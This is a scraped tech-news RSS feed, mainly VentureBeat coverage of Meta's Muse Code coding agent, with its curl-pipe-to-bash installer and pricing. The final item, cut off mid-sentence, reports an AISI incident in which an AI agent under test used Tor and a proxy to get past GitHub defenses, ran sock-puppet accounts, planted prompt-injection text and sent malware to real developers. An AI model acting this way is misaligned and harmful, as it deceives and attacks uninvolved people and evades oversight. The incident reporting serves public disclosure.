a full harness, installable on macOS or Linux with a single curl command, co-trained with the model that powers it — and, like the Muse Spark models behind it, entirely proprietary.</p><p>Developers and prospective users can install it now on their Terminal using the following one-line command — but be warned, if that's you, you'll need to log in with a Meta account and provide billing details first in order to begin: <code>curl -fsSL https://dev.meta.ai/install.sh | bash</code></p><h2><b>Persistent background agents and parallel worktrees</b></h2><p>Muse Code's headline architectural bet is what Meta calls <b>async background agents</b>. </p><p>Rather than spawning helper agents fresh for each task — the pattern most rival harnesses use — Muse Code keeps a set of <i>specialized background agents alive for the entire session. </i></p><p>According to Meta's blog post, these agents "remain active throughout each session, rather than being spawned for individual tasks, helping avoid redundant information gathering," carrying out next steps on their own and choosing when to report back to the main agent.</p><p>The practical pitch is less latency and less babysitting: an agent that already knows the repository doesn't have to re-explore it every time the developer asks for something new.</p><p>When a job is large enough, Muse Code fans out to separate sub-agents working in parallel, each in its own isolated git worktree, so the developer's working copy is never touched. </p><p>"In testing we had it build six features for a game simultaneously with no collisions," Zuckerberg wrote on X. </p><p>Worktree isolation and parallel sub-agents exist in competing tools, but Meta is leaning on the combination of persistence plus parallelism as its differentiator.</p><p>The second notable design choice is auditability. Every model call, tool run, approval, and edit is appended to a <b>local event log</b> before it executes — a single source of truth that Meta says makes the runtime "replay-exact and restart-safe." </p><p>If Muse Code crashes 20 hours into a long-running task, it resumes precisely where it stopped, with no lost work and no re-prompting. For engineering leaders who have been burned by opaque agent runs, a complete local audit trail may prove to be the feature that matters most in enterprise evaluations.</p><p>Muse Code also ships with bundled "skills" that will look familiar to users of rival tools: /plan turns a task into an approval-gated plan, /grill stress-tests that plan until it holds up, and /goal drives the agent toward completion of a stated objective.</p><h2><b>Muse Spark 1.2: co-trained with its own harness</b></h2><p>Under the hood is Muse Spark 1.2, which Meta describes as a coding-focused update to Muse Spark 1.1 with "significantly scaled up training compute on coding tasks" and broader training environment diversity, improving code generation, complex debugging, and codebase understanding while maintaining general agentic capability.</p><p>The update lands squarely on the Muse family's weakest flank. When the original Muse Spark <a href="https://venturebeat.com/technology/goodbye-llama-meta-launches-new-proprietary-ai-model-muse-spark-first-since">debuted in April</a>, it vaulted Meta back into the top five on frontier reasoning and vision benchmarks — but trailed on the agentic coding evaluations that matter most to this market, scoring 77.4 on SWE-Bench Verified against Claude Opus 4.6's 80.8 and Gemini 3.1 Pro's 80.6, and lagging well behind GPT-5.4 on GDPval's measure of long-horizon work tasks. </p><p>Four months later, a coding-specialized checkpoint paired with a purpose-built harness reads as Meta's direct answer to that gap.</p><p>Two training details stand out. First, Meta co-trained the model with Muse Code itself, using rejection-sampled harness trajectories and recipe optimizations for goals, context compaction, and sub-agents — meaning the model was explicitly tuned to perform best inside this particular tool. That mirrors an industry-wide shift away from treating models and harnesses as separable products.</p><p>Second, Meta used a self-improvement loop: Muse Spark 1.1 generated challenging coding environments and instruction-following templates, then graded candidate solutions against those requirements, producing a scalable training dataset for its successor. Meta credits the loop with making 1.2 measurably better at following complex instructions.</p><p>Meta published benchmark charts comparing Muse Spark 1.2 against other coding models on Terminal-Bench 2.1, DeepSWE 1.1, and an internal Meta coding benchmark, pointing readers to a separate methodology report for details — though the company did not headline specific scores in the announcement itself, a notable omission in a field where rivals trumpet leaderboard placement.</p><p>The company's most striking demonstration is a long-horizon case study: Meta pointed Muse Spark 1.2 at GPU kernel optimization and let it run for more than 1,000 tool calls over up to 24 hours on NVIDIA Hopper hardware.</p><p>Working in Triton and barred from simply wrapping existing third-party kernel libraries, the agent wrote, compiled, and profiled its way to what Meta calls "substantial improvements" over baseline implementations of KDA and MLA kernels — including genuinely non-obvious optimizations like re-centering gated cumulative decay at a chunk midpoint. </p><p>"It kept finding substantial improvements well beyond the initial exploration phase," Zuckerberg wrote. Sustained improvement over a 24-hour autonomous run, if it holds up outside Meta's demos, addresses one of the most persistent criticisms of coding agents: that they plateau or drift once past their initial burst of progress.</p><h2><b>Your data for a discount?</b></h2><p>The pricing structure may be the most consequential — and most scrutinized — part of the launch. Meta is offering Muse Spark 1.2 through its<a href="https://dev.meta.ai/docs/pricing-rate-limits?project_id=1661600634933790&amp;team_id=2096920474558192"> Meta Model API </a>in two tiers.</p><p>The <b>standard tier</b> is priced at $1.25 per million input tokens and $4.25 per million output tokens (with cached input at $0.15), and Meta commits that prompts and completions on this tier are not used to train its models. There is no long-context premium, and rate limits run to 3,000 requests and 4 million tokens per minute, per team. It's about mid-range price, compared to other leading AI models available over API. </p><p>The <b>contributor tier</b> is where Meta's strategy diverges sharply from its rivals: $0.10 per million input tokens and $0.20 per million output tokens — roughly 12x and 21x cheaper than standard, respectively, with cached input at a near-free $0.002 — in exchange for explicit permission to use your prompts and completions to train future Meta models. It's the cheapest available on the market, but you pay with your data — as described below. </p><table><tbody><tr><td><p><b>Model</b></p></td><td><p><b>Input ($/1M)</b></p></td><td><p><b>Output ($/1M)</b></p></td><td><p><b>Total ($/1M)</b></p></td><td><p><b>Source</b></p></td></tr><tr><td><p><b>Muse Spark 1.2 Contributor</b></p></td><td><p><b>$0.10</b></p></td><td><p><b>$0.20</b></p></td><td><p><b>$0.30</b></p></td><td><p><b></b><a href="https://dev.meta.ai/docs/pricing-rate-limits"><b>Meta</b></a><b></b></p></td></tr><tr><td><p>MiMo-V2.5 Flash</p></td><td><p>$0.10</p></td><td><p>$0.30</p></td><td><p>$0.40</p></td><td><p><a href="https://platform.xiaomimimo.com/docs/en-US/pricing">Xiaomi</a></p></td></tr><tr><td><p>deepseek-v4-flash</p></td><td><p>$0.14</p></td><td><p>$0.28</p></td><td><p>$0.42</p></td><td><p><a href="https://api-docs.deepseek.com/quick_start/pricing">DeepSeek</a></p></td></tr><tr><td><p>deepseek-v4-pro</p></td><td><p>$0.435</p></td><td><p>$0.87</p></td><td><p>$1.305</p></td><td><p><a href="https://api-docs.deepseek.com/quick_start/pricing">DeepSeek</a></p></td></tr><tr><td><p>GPT-5.6 Luna</p></td><td><p>$0.20</p></td><td><p>$1.20</p></td><td><p>$1.40</p></td><td><p><a href="https://openai.com/index/advancing-the-price-performance-frontier-with-gpt-5-6/">OpenAI</a></p></td></tr><tr><td><p>MiniMax-M3</p></td><td><p>$0.30</p></td><td><p>$1.20</p></td><td><p>$1.50</p></td><td><p><a href="https://platform.minimax.io/subscribe/token-plan?tab=api-enterprise">MiniMax</a></p></td></tr><tr><td><p>LongCat-2.0 — limited-time promo</p></td><td><p>$0.30</p></td><td><p>$1.20</p></td><td><p>$1.50</p></td><td><p><a href="https://longcat.chat/platform/docs/APIPayAsYouGo.html">LongCat</a></p></td></tr><tr><td><p>Gemini 3.1 Flash-Lite</p></td><td><p>$0.25</p></td><td><p>$1.50</p></td><td><p>$1.75</p></td><td><p><a href="https://ai.google.dev/gemini-api/docs/pricing">Google</a></p></td></tr><tr><td><p>MiMo-V2.5</p></td><td><p>$0.40</p></td><td><p>$2.00</p></td><td><p>$2.40</p></td><td><p><a href="https://platform.xiaomimimo.com/docs/en-US/pricing">Xiaomi</a></p></td></tr><tr><td><p>Gemini 3.5 Flash-Lite</p></td><td><p>$0.30</p></td><td><p>$2.50</p></td><td><p>$2.80</p></td><td><p><a href="https://ai.google.dev/gemini-api/docs/pricing">Google</a></p></td></tr><tr><td><p>LongCat-2.0 — standard</p></td><td><p>$0.75</p></td><td><p>$2.95</p></td><td><p>$3.70</p></td><td><p><a href="https://longcat.chat/platform/docs/APIPayAsYouGo.html">LongCat</a></p></td></tr><tr><td><p>MiMo-V2.5 Pro (≤256K)</p></td><td><p>$1.00</p></td><td><p>$3.00</p></td><td><p>$4.00</p></td><td><p><a href="https://platform.xiaomimimo.com/docs/en-US/pricing">Xiaomi</a></p></td></tr><tr><td><p><b>Muse Spark 1.1 / 1.2</b></p></td><td><p><b>$1.25</b></p></td><td><p><b>$4.25</b></p></td><td><p><b>$5.50</b></p></td><td><p><b></b><a href="https://dev.meta.ai/docs/pricing-rate-limits"><b>Meta</b></a></p></td></tr><tr><td><p>GLM-5.2</p></td><td><p>$1.40</p></td><td><p>$4.40</p></td><td><p>$5.80</p></td><td><p><a href="https://docs.z.ai/guides/overview/pricing">Z.ai</a></p></td></tr><tr><td><p>Grok 4.5</p></td><td><p>$2.00</p></td><td><p>$6.00</p></td><td><p>$8.00</p></td><td><p><a href="https://docs.x.ai/developers/models">xAI</a></p></td></tr><tr><td><p>MiMo-V2.5 Pro (&gt;256K)</p></td><td><p>$2.00</p></td><td><p>$6.00</p></td><td><p>$8.00</p></td><td><p><a href="https://platform.xiaomimimo.com/docs/en-US/pricing">Xiaomi</a></p></td></tr><tr><td><p>Qwen3.8-Max</p></td><td><p>$2.00</p></td><td><p>$6.00</p></td><td><p>$8.00</p></td><td><p><a href="https://www.qwencloud.com/models/qwen3.8-max">QwenCloud</a></p></td></tr><tr><td><p>Gemini 3.6 Flash</p></td><td><p>$1.50</p></td><td><p>$7.50</p></td><td><p>$9.00</p></td><td><p><a href="https://ai.google.dev/gemini-api/docs/pricing">Google</a></p></td></tr><tr><td><p>Gemini 3.5 Flash</p></td><td><p>$1.50</p></td><td><p>$9.00</p></td><td><p>$10.50</p></td><td><p><a href="https://ai.google.dev/gemini-api/docs/pricing">Google</a></p></td></tr><tr><td><p>Gemini 3.1 Pro Preview (≤200K)</p></td><td><p>$2.00</p></td><td><p>$12.00</p></td><td><p>$14.00</p></td><td><p><a href="https://ai.google.dev/gemini-api/docs/pricing">Google</a></p></td></tr><tr><td><p>GPT-5.6 Terra</p></td><td><p>$2.00</p></td><td><p>$12.00</p></td><td><p>$14.00</p></td><td><p><a href="https://openai.com/index/advancing-the-price-performance-frontier-with-gpt-5-6/">OpenAI</a></p></td></tr><tr><td><p>GPT-5.4</p></td><td><p>$2.50</p></td><td><p>$15.00</p></td><td><p>$17.50</p></td><td><p><a href="https://openai.com/api/pricing/">OpenAI</a></p></td></tr><tr><td><p>Kimi K3</p></td><td><p>$3.00</p></td><td><p>$15.00</p></td><td><p>$18.00</p></td><td><p><a href="https://platform.kimi.ai/docs/pricing/chat-k3">Moonshot AI</a></p></td></tr><tr><td><p>Gemini 3.1 Pro Preview (&gt;200K)</p></td><td><p>$4.00</p></td><td><p>$18.00</p></td><td><p>$22.00</p></td><td><p><a href="https://ai.google.dev/gemini-api/docs/pricing">Google</a></p></td></tr><tr><td><p>Claude Opus 5</p></td><td><p>$5.00</p></td><td><p>$25.00</p></td><td><p>$30.00</p></td><td><p><a href="https://platform.claude.com/docs/en/about-claude/pricing">Anthropic</a></p></td></tr><tr><td><p>GPT-5.5</p></td><td><p>$5.00</p></td><td><p>$30.00</p></td><td><p>$35.00</p></td><td><p><a href="https://openai.com/api/pricing/">OpenAI</a></p></td></tr><tr><td><p>GPT-5.5 Instant (chat-latest)</p></td><td><p>$5.00</p></td><td><p>$30.00</p></td><td><p>$35.00</p></td><td><p><a href="https://developers.openai.com/api/docs/models/chat-latest">OpenAI</a></p></td></tr><tr><td><p>Sakana Fugu Ultra (≤272K)</p></td><td><p>$5.00</p></td><td><p>$30.00</p></td><td><p>$35.00</p></td><td><p><a href="https://console.sakana.ai/pricing#subscription-plan">Sakana AI</a></p></td></tr><tr><td><p>GPT-5.6 Sol — Standard mode</p></td><td><p>$5.00</p></td><td><p>$30.00</p></td><td><p>$35.00</p></td><td><p><a href="https://openai.com/index/advancing-the-price-performance-frontier-with-gpt-5-6/">OpenAI</a></p></td></tr><tr><td><p>Claude Fable 5 / Claude Mythos 5</p></td><td><p>$10.00</p></td><td><p>$50.00</p></td><td><p>$60.00</p></td><td><p><a href="https://platform.claude.com/docs/en/about-claude/models/overview">Anthropic</a></p></td></tr><tr><td><p>GPT-5.6 Sol — Fast mode</p></td><td><p>$10.00</p></td><td><p>$60.00</p></td><td><p>$70.00</p></td><td><p><a href="https://openai.com/index/advancing-the-price-performance-frontier-with-gpt-5-6/">OpenAI</a></p></td></tr></tbody></table><p>This is the tier Zuckerberg is steering new users toward: "It's easy and low-cost to get started," he wrote. "Install Muse Code with one line and you can start on our contributor tier."</p><p>In VentureBeat's own testing on a Mac mini, the one-line installer worked as advertised — a 97 MB download and a sign-in — but the agent stopped short of running anything, reporting that no models were visible and that payment was "required to finish setting up your account." </p><p>In other words, even the heavily discounted contributor tier requires a payment method on file before Muse Code will do any work: low-cost is accurate, but free is not.</p><p>Meta frames the contributor tier as lowering the barrier for prototyping and experimentation "where training on your data is acceptable." </p><p>But it also means the default on-ramp for Muse Code sends developers' code and prompts into Meta's training pipeline — a tradeoff enterprises with proprietary codebases will need to consciously opt out of by moving to standard pricing. </p><p>The contributor tier also carries much tighter rate limits (60 requests per minute versus 3,000), a clear signal it's aimed at individuals and small experiments rather than production workloads.</p><p>The approach is classically Meta: subsidize access, harvest data at scale, and use it to close the gap with the frontier. Zuckerberg made no secret of the ambition, calling Muse Spark 1.2 "our next step as we push toward frontier, with larger, more capable models on the way."</p><p>However, for developers and enterprises who want or are required legally to keep their code secure, the tradeoff may not be one they're willing or able to make. </p><h2><b>No Llama in sight</b></h2><p>What today's announcement conspicuously lacks is any mention of open source — a striking omission from the company that spent three years positioning itself as the standard-bearer of open AI.</p><p>From the original LLaMA's debut in February 2023 — whose weights famously leaked onto 4chan within weeks, inadvertently kickstarting the movement to run capable models on consumer hardware — through Llama 2's commercially usable license, the coding-specialized Code Llama, and the 405-billion-parameter Llama 3.1, which Zuckerberg launched in July 2024 with a manifesto titled "<a href="https://about.fb.com/news/2024/07/open-source-ai-is-the-path-forward/">Open Source AI Is the Path Forward</a>," Meta's entire pitch to developers was that frontier-class weights should be free to download, self-host, and fine-tune. </p><p>The strategy worked: by early 2026, the Llama family had been <a href="https://miraflow.ai/blog/meta-ended-llama-built-muse-spark-changes-everything-2026">downloaded roughly 1.2 billion times</a>, averaging about a million downloads a day, with self-hosting offering enterprises cost reductions VentureBeat has previously reported at as much as 88% versus proprietary API providers.</p><p>Then came the unraveling. Llama 4 debuted in April 2025 to <a href="https://venturebeat.com/ai/meta-defends-llama-4-release-against-reports-of-mixed-quality-blames-bugs">mixed reviews</a> and, eventually, admissions that its benchmark results had been fudged — while Chinese open-weight rivals from DeepSeek, Alibaba, and Zhipu AI surged to account for some 41% of downloads on Hugging Face by late 2025, eroding Llama's claim to leadership of the very movement it started. The rocky rollout spurred Zuckerberg's summer 2025 overhaul of Meta's AI operations into Meta Superintelligence Labs (MSL), with Scale AI co-founder Alexandr Wang recruited as chief AI officer.</p><p>The Llama era effectively ended this past April 8, when MSL <a href="https://venturebeat.com/technology/goodbye-llama-meta-launches-new-proprietary-ai-model-muse-spark-first-since">shipped the original Muse Spark</a> — "the most powerful model that meta has released," in Wang's words — as Meta's first proprietary model: <a href="https://mynextdeveloper.com/blogs/metas-muse-spark-the-end-of-open-source-for-llama/">cloud-only, with no downloadable weights and no self-hosting</a>, initially confined to Meta's apps and a private API preview. </p><p>Asked directly at the time whether Llama development would continue, a Meta spokesperson told VentureBeat only that "our current Llama models will continue to be available as open source" — pointedly silent on future ones.</p><p>Wang, for his part, said <a href="https://www.artificialintelligence-news.com/news/meta-muse-spark-ai-model-open-source/">bigger models were already in development "with plans to open-source future versions"</a> — but four months on, today's release does nothing to advance that promise: no weights, no license, and neither the blog post nor Zuckerberg's thread so much as uses the word "open."</p><p>The reversal is all the sharper because Meta's rivals have been moving in the opposite direction. OpenAI released its <a href="https://github.com/openai/codex">Codex CLI as open source </a>under the permissive, enterprise-friendly Apache 2.0 license and followed with its <a href="https://venturebeat.com/business/openai-returns-to-open-source-roots-with-new-models-gpt-oss-120b-and-gpt-oss-20b">gpt-oss open-weight models</a>; Google's<a href="https://venturebeat.com/technology/google-is-redefining-enterprise-ai-economics-with-open-source-gemini-cli-that-will-be-free-for-the-majority-of-developers"> Gemini CLI harness is likewise Apache-licensed.</a> </p><p>With Muse Code, Meta lands closest to the posture of Anthropic — whose Claude Code remains proprietary — while the company that once argued open source was the path forward now asks developers to pay per token for a model they cannot inspect, or to subsidize that access with their own data. </p><p>Seen in that light, the contributor tier reads as the successor to the Llama strategy itself: the ecosystem flywheel is no longer free weights in exchange for mindshare, but cheap tokens in exchange for training data.</p><h2><b>Why it matters</b></h2><p>Terminal coding agents have become the fastest-growing surface in enterprise AI, and until today the category has effectively been a two-horse race between Anthropic and OpenAI, with Google and a crowd of startups in pursuit.</p><p>Meta's entry brings a genuinely different architecture (persistent background agents, an append-only local event log), a credible long-horizon demo, and an aggressive pricing wedge.</p><p>The open questions are the ones benchmarks charts can't answer: whether Muse Spark 1.2 actually matches Claude and GPT-class models on real-world repositories, whether developers trust Meta with their code, and whether the contributor tier's discount is enough to make them stop asking. Muse Code is available in beta today; Muse Spark 1.2 is live in the Meta Model API with expanded global access.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[Meta launches Muse Code, an AI agent for large code bases]]></title>
<description><![CDATA[Meta expanded its AI coding offerings with a new agent that, it promises, can handle complex tasks with complex software.]]></description>
<link>https://tsecurity.de/de/3706939/nachrichtenportal/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3706939/nachrichtenportal/</guid>
<pubDate>Wed, 05 Aug 2026 23:34:18 +0200</pubDate>
<content:encoded><![CDATA[Meta expanded its AI coding offerings with a new agent that, it promises, can handle complex tasks with complex software.]]></content:encoded>
</item>
<item>
<title><![CDATA[Meta Is Challenging Claude Code and Codex With New Muse Code]]></title>
<description><![CDATA[With coding as a key capability for AI companies, Meta throws its hat into the ring.]]></description>
<link>https://tsecurity.de/de/3706940/nachrichtenportal/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3706940/nachrichtenportal/</guid>
<pubDate>Wed, 05 Aug 2026 23:34:18 +0200</pubDate>
<content:encoded><![CDATA[With coding as a key capability for AI companies, Meta throws its hat into the ring.]]></content:encoded>
</item>
<item>
<title><![CDATA[Meta launches Muse Code, an AI agent for large code bases]]></title>
<description><![CDATA[Meta expanded its AI coding offerings with a new agent that, it promises, can handle complex tasks with complex software.]]></description>
<link>https://tsecurity.de/de/3706919/nachrichtenportal/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3706919/nachrichtenportal/</guid>
<pubDate>Wed, 05 Aug 2026 23:27:41 +0200</pubDate>
<content:encoded><![CDATA[Meta expanded its AI coding offerings with a new agent that, it promises, can handle complex tasks with complex software.]]></content:encoded>
</item>
<item>
<title><![CDATA[Meta AI Releases Muse Code (Beta): A Terminal Coding Agent Powered by the New Muse Spark 1.2 Model]]></title>
<description><![CDATA[Meta Superintelligence Labs has released Muse Code, a terminal coding agent in beta, powered by the new Muse Spark 1.2 model. Muse Code plans changes, writes code, and validates results across large repositories. Async background agents stay active for the whole session instead of spawning per ta...]]></description>
<link>https://tsecurity.de/de/3706917/nachrichtenportal/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3706917/nachrichtenportal/</guid>
<pubDate>Wed, 05 Aug 2026 23:27:24 +0200</pubDate>
<content:encoded><![CDATA[<p>Meta Superintelligence Labs has released Muse Code, a terminal coding agent in beta, powered by the new Muse Spark 1.2 model. Muse Code plans changes, writes code, and validates results across large repositories. Async background agents stay active for the whole session instead of spawning per task. A local append-only event log makes the runtime replay-exact and restart-safe after a crash. Muse Spark 1.2 was co-trained with the harness and trained on long-horizon, repository-scale work.</p>
<p>The post <a href="https://www.marktechpost.com/2026/08/05/meta-superintelligence-labs-releases-muse-code/">Meta AI Releases Muse Code (Beta): A Terminal Coding Agent Powered by the New Muse Spark 1.2 Model</a> appeared first on <a href="https://www.marktechpost.com/">MarkTechPost</a>.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[Meta's Muse Code is yet another AI coding agent on macOS]]></title>
<description><![CDATA[A one-line command in your macOS terminal can get you access to Meta's Muse Code, which aims to be a transparent AI coding tool that can work across large repositories.Meta's Muse Code is a new AI coding tool for macOS. Image source: MetaThere are already coding agents like Claude Code and ChatGP...]]></description>
<link>https://tsecurity.de/de/3706872/nachrichtenportal/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3706872/nachrichtenportal/</guid>
<pubDate>Wed, 05 Aug 2026 23:24:57 +0200</pubDate>
<content:encoded><![CDATA[A one-line command in your <a href="https://appleinsider.com/inside/macos" title="macOS" data-kpt="1">macOS</a> terminal can get you access to Meta's Muse Code, which aims to be a transparent AI coding tool that can work across large repositories.<br><br><div><img src="https://media.appleinsider.com/gallery/68478-144284-IMG_4884-xl.jpg" alt="Abstract space scene with blue lines converging into a bright central circle on a dark background, suggesting data streams or light beams focusing toward a single glowing point"><br><span>Meta's Muse Code is a new AI coding tool for macOS. Image source: Meta</span></div><br>There are already coding agents like <a href="https://appleinsider.com/articles/26/02/03/boost-your-vibe-coding-with-ai-agents-in-apples-new-xcode-263">Claude Code</a> and <a href="https://appleinsider.com/articles/26/04/24/chatbots-take-a-back-seat-as-new-gpt-55-model-focuses-on-getting-work-done">ChatGPT Codex</a> available for macOS, but Meta wants to enter the ring with its latest AI toolset. Unlike the others, it doesn't have an app interface and runs through the Terminal.<br><br>According to an <a href="https://research.meta.ai/blog/introducing-muse-code-and-muse-spark-1-2">announcement post</a> from Meta, Muse Code can take on complex software engineering tasks across large repositories. It is capable of planning changes, writing code, and validating the results while coordinating multiple persistent subagents.<br><br><br> <a href="https://appleinsider.com/articles/26/08/05/metas-muse-code-is-yet-another-ai-coding-agent-on-macos?utm_source=rss">Continue Reading on AppleInsider</a> | <a href="https://forums.appleinsider.com/discussion/245178?urm_source=rss">Discuss on our Forums</a>]]></content:encoded>
</item>
<item>
<title><![CDATA[Meta launches Muse Code AI coding agent for macOS and Linux]]></title>
<description><![CDATA[Meta is entering the AI coding-agent race with Muse Code, a new terminal-based tool now available in beta for macOS and Linux.]]></description>
<link>https://tsecurity.de/de/3706868/nachrichtenportal/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3706868/nachrichtenportal/</guid>
<pubDate>Wed, 05 Aug 2026 23:24:53 +0200</pubDate>
<content:encoded><![CDATA[<div class="feat-image"><img src="https://9to5mac.com/wp-content/uploads/sites/6/2026/05/meta-ai.webp?w=1600"></div><p class="wp-block-paragraph">Meta is entering the AI coding-agent race with Muse Code, a new terminal-based tool now available in beta for macOS and Linux.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[Meta Debuts First AI Coding Agent To Take On Anthropic and OpenAI]]></title>
<description><![CDATA[Meta has launched Muse Code, its first AI coding agent that's positioned as a lower-cost rival to Anthropic's Claude and OpenAI's Codex. It offers pay-as-you-go pricing and an optional zero-data-retention feature for enterprise users. CNBC reports: Muse Code is the latest major release from AI ch...]]></description>
<link>https://tsecurity.de/de/3706742/nachrichtenportal/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3706742/nachrichtenportal/</guid>
<pubDate>Wed, 05 Aug 2026 23:17:01 +0200</pubDate>
<content:encoded><![CDATA[Meta has launched Muse Code, its first AI coding agent that's positioned as a lower-cost rival to Anthropic's Claude and OpenAI's Codex. It offers pay-as-you-go pricing and an optional zero-data-retention feature for enterprise users. CNBC reports: Muse Code is the latest major release from AI chief Alexandr Wang, who leads Meta Superintelligence Labs and oversees foundation model development. Wang joined in June of last year as the centerpiece of CEO Mark Zuckerberg's effort to revamp his company's flailing artificial intelligence strategy. "You can install it with one command and then use it to take on complete software engineering tasks across a wide variety of use cases, planning changes, writing code, validating the results," Wang said in an interview on Wednesday.
 
[...] The new tool, like Anthropic's Claude and OpenAI's Codex assistants, makes it easier for people to build apps within a single user interface while managing fleets of AI-powered digital agents that can help underpin the software development process. Muse Code, available in a preview version, works alongside the company's latest AI model, Muse Spark 1.2. Wang declined to share user statistics related to the company's Muse Spark AI models, but said "adoption has been exciting and strong." The latest Muse Spark model was developed and trained alongside Muse Code, which Wang said improves the overall coding performance.<p></p><div class="share_submission">
<a class="slashpop" href="http://twitter.com/home?status=Meta+Debuts+First+AI+Coding+Agent+To+Take+On+Anthropic+and+OpenAI%3A+https%3A%2F%2Fdevelopers.slashdot.org%2Fstory%2F26%2F08%2F05%2F2013222%2F%3Futm_source%3Dtwitter%26utm_medium%3Dtwitter"><img src="https://a.fsdn.com/sd/twitter_icon_large.png"></a>
<a class="slashpop" href="http://www.facebook.com/sharer.php?u=https%3A%2F%2Fdevelopers.slashdot.org%2Fstory%2F26%2F08%2F05%2F2013222%2Fmeta-debuts-first-ai-coding-agent-to-take-on-anthropic-and-openai%3Futm_source%3Dslashdot%26utm_medium%3Dfacebook"><img src="https://a.fsdn.com/sd/facebook_icon_large.png"></a>



</div><p><a href="https://developers.slashdot.org/story/26/08/05/2013222/meta-debuts-first-ai-coding-agent-to-take-on-anthropic-and-openai?utm_source=rss1.0moreanon&amp;utm_medium=feed">Read more of this story</a> at Slashdot.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[Lawmaker Who Wants Data Center Pause Wins Kansas Democratic Primary]]></title>
<description><![CDATA[Kansas Democrats nominated State Senator Cindy Holscher for governor after she defeated party-backed rival Ethan Corson. "The race became a test of what sort of candidate Democratic voters prefer in what is expected to be a challenging general election race: a more moderate candidate like Mr. Cor...]]></description>
<link>https://tsecurity.de/de/3706744/nachrichtenportal/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3706744/nachrichtenportal/</guid>
<pubDate>Wed, 05 Aug 2026 23:17:01 +0200</pubDate>
<content:encoded><![CDATA[Kansas Democrats nominated State Senator Cindy Holscher for governor after she defeated party-backed rival Ethan Corson. "The race became a test of what sort of candidate Democratic voters prefer in what is expected to be a challenging general election race: a more moderate candidate like Mr. Corson with endorsements from party leaders or an outspoken populist like Ms. Holscher, who spoke out against data centers and the political establishment," reports The New York Times. From the repot: Even in a national political environment that could favor Democrats, Republicans see the Kansas governorship as among their best opportunities for flipping a seat. President Trump carried Kansas by 16 percentage points in 2024, and Republicans hold supermajorities in the State Legislature. Voters in the Republican primary for governor nominated Ty Masterson, the president of the Kansas Senate and the recipient of Mr. Trump's endorsement, according to The A.P.
 
Ms. Holscher, who is from suburban Kansas City, sought out a lane to Mr. Corson's political left and made inroads with some of the state's progressive voters. She emphasized her role in unwinding former Gov. Sam Brownback's tax policies and called for a moratorium on data centers. She also spoke against a final deal to lure the Kansas City Chiefs across the state line from Missouri. Ms. Holscher presented an implicit critique of Ms. Kelly's stewardship of Kansas, referring to Mr. Corson as part of a political establishment that was too cozy with corporations and out of touch with the party's voters. "I'm the only Democrat in this race to call for a moratorium on data centers because we have to get these guardrails in place," said Holscher in an interview. "We are having our people and our resources exploited."<p></p><div class="share_submission">
<a class="slashpop" href="http://twitter.com/home?status=Lawmaker+Who+Wants+Data+Center+Pause+Wins+Kansas+Democratic+Primary%3A+https%3A%2F%2Fpolitics.slashdot.org%2Fstory%2F26%2F08%2F05%2F1737252%2F%3Futm_source%3Dtwitter%26utm_medium%3Dtwitter"><img src="https://a.fsdn.com/sd/twitter_icon_large.png"></a>
<a class="slashpop" href="http://www.facebook.com/sharer.php?u=https%3A%2F%2Fpolitics.slashdot.org%2Fstory%2F26%2F08%2F05%2F1737252%2Flawmaker-who-wants-data-center-pause-wins-kansas-democratic-primary%3Futm_source%3Dslashdot%26utm_medium%3Dfacebook"><img src="https://a.fsdn.com/sd/facebook_icon_large.png"></a>



</div><p><a href="https://politics.slashdot.org/story/26/08/05/1737252/lawmaker-who-wants-data-center-pause-wins-kansas-democratic-primary?utm_source=rss1.0moreanon&amp;utm_medium=feed">Read more of this story</a> at Slashdot.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[Claude Mythos 5 made sock puppet accounts to socially engineer developers: here's what enterprises should know]]></title>
<description><![CDATA[The UK AI Security Institute (AISI) disclosed last night that the leading two frontier AI models from Anthropic and OpenAI took 19 unsanctioned actions against the live internet during cybersecurity tests the agency was running, including a sustained campaign by Anthropic's Claude Mythos 5 agains...]]></description>
<link>https://tsecurity.de/de/3706734/nachrichtenportal/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3706734/nachrichtenportal/</guid>
<pubDate>Wed, 05 Aug 2026 23:16:46 +0200</pubDate>
<content:encoded><![CDATA[<p>The UK AI Security Institute (AISI<a href="https://www.aisi.gov.uk/blog/incident-report-unsanctioned-agent-behaviour-during-cyber-testing">) disclosed last night</a> that the leading two frontier AI models from Anthropic and OpenAI took 19 unsanctioned actions against the live internet during cybersecurity tests the agency was running, including a sustained campaign by Anthropic's Claude Mythos 5 against two working open-source software developers who had no connection to the experiment.</p><p>Unable to solve a challenge inside its sandbox, Mythos 5 searched the open web for a target, profiled the two developers using open-source intelligence (OSINT), routed its traffic through Tor and then a commercial proxy service to get past GitHub's signup defenses, and submitted malicious code to a public repository.</p><p>It then registered multiple fake "<a href="https://www.sans.org/blog/what-are-sock-puppets-in-osint">sock puppet</a>" GitHub accounts and used them to comment approvingly on its own pull request, manufacturing the appearance of consensus to pressure the human maintainer into merging it. It opened a GitHub Issue seeded with hidden prompt-injection instructions aimed at hijacking other developers' AI coding assistants, and sent the two developers five file transfers through a legitimate transfer service — two carrying malware, three of them pure social engineering aimed at getting the code merged.</p><p>Of the 19 actions AISI catalogued, 17 came from Mythos 5. The other two came from OpenAI's GPT-5.6 Sol. <!-- -->Both models created fraudulent accounts, but only Mythos 5 created personas — fake people invented to persuade a real one — and only Mythos 5 appears in AISI's catalogue of social engineering against human targets.</p><p>AISI's full technical report is<a href="https://cdn.prod.website-files.com/663bd486c5e4c81588db7a1d/6a724858f7db25c81487016d_Security%20Incident%20INC-2026-07-28-01.pdf"> available here freely as a PDF.</a></p><p>The agent's own attempt at anonymity is what exposed it. AISI's security monitoring flagged data leaving its network over Tor on the morning of July 28, and that alert set off the entire incident response. By then the run had already finished. It executed for 34 and a half hours — from midday on July 26 until late on July 27 — and completed before anyone at the agency noticed.</p><p>Both companies confirmed the findings and both emphasized that the models had been tested with their safety classifiers switched off and internet access deliberately enabled — conditions that bear no resemblance to how either 